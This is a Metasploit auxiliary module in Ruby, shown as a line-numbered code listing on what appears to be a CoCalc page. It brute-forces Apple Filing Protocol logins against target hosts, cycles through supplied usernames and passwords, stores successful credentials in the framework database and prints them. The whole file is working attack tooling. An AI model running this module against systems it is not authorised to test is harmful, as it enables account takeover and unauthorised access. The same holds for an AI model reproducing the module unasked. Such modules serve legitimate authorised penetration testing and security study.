CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'openssl'
7
require 'metasploit/framework/credential_collection'
8
require 'metasploit/framework/login_scanner/afp'
9

10
class MetasploitModule < Msf::Auxiliary
11
  include Msf::Auxiliary::Report
12
  include Msf::Auxiliary::Scanner
13
  include Msf::Auxiliary::AuthBrute
14
  include Msf::Exploit::Remote::AFP
15

16
  def initialize(info={})
17
    super(update_info(info,
18
      'Name'         => 'Apple Filing Protocol Login Utility',
19
      'Description'  => %q{
20
        This module attempts to bruteforce authentication credentials for AFP.
21
      },
22
      'References'     =>
23
        [
24
          [ 'URL', 'https://web.archive.org/web/20130309051753/https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ],
25
          [ 'URL', 'https://developer.apple.com/library/mac/documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html' ]
26

27
        ],
28
      'Author'       => [ 'Gregory Man <man.gregory[at]gmail.com>' ],
29
      'License'      => MSF_LICENSE
30
    ))
31

32
    register_options(
33
      [
34
        Opt::Proxies,
35
        OptInt.new('LoginTimeOut', [ true, "Timeout on login", 23 ]),
36
        OptBool.new('RECORD_GUEST', [ false, "Record guest login to the database", false]),
37
        OptBool.new('CHECK_GUEST', [ false, "Check for guest login", true])
38
      ], self)
39
  end
40

41
  def run_host(ip)
42
    print_status("Scanning IP: #{ip.to_s}")
43

44
    cred_collection = build_credential_collection(
45
        username: datastore['USERNAME'],
46
        password: datastore['PASSWORD'],
47
    )
48

49
    scanner = Metasploit::Framework::LoginScanner::AFP.new(
50
      configure_login_scanner(
51
        host: ip,
52
        port: rport,
53
        proxies: datastore['PROXIES'],
54
        cred_details: cred_collection,
55
        stop_on_success: datastore['STOP_ON_SUCCESS'],
56
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
57
        connection_timeout: 30,
58
        max_send_size: datastore['TCP::max_send_size'],
59
        send_delay: datastore['TCP::send_delay'],
60
        framework: framework,
61
        framework_module: self,
62
        ssl: datastore['SSL'],
63
        ssl_version: datastore['SSLVersion'],
64
        ssl_verify_mode: datastore['SSLVerifyMode'],
65
        ssl_cipher: datastore['SSLCipher'],
66
        local_port: datastore['CPORT'],
67
        local_host: datastore['CHOST']
68
      )
69
    )
70

71
    scanner.scan! do |result|
72
      credential_data = result.to_h
73
      credential_data.merge!(
74
          module_fullname: self.fullname,
75
          workspace_id: myworkspace_id
76
      )
77
      if result.success?
78
        credential_core = create_credential(credential_data)
79
        credential_data[:core] = credential_core
80
        create_credential_login(credential_data)
81

82
        print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"
83
      else
84
        invalidate_login(credential_data)
85
        vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
86
      end
87
    end
88
  end
89

90

91
end
92

93